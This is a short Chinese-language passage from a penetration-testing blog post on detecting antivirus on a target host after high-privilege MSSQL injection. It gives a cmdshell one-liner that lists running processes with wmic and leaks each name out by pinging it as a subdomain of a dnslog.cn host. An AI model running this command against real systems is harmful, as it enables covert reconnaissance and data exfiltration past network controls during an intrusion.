原文链接:如何利用dnslog探测目标主机杀软
0x01 前言
2021年7月某天,团队@Twe1ve老哥遇到这样一个场景:MSSQL高权限注入,目标主机不出网,想利用dnslog探测这台主机中是否存在杀软?
当时想都没想,就回了句难搞!其实还是能实现的,最后和他一起测试出了两种方法。 0x02 利用cmdshell for循环实现
两种方法原理一样,都是先获取目标主机的进程,然后通过for、ForEach循环Ping dnslog外带出来。
for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.******.dnslog.cn >nul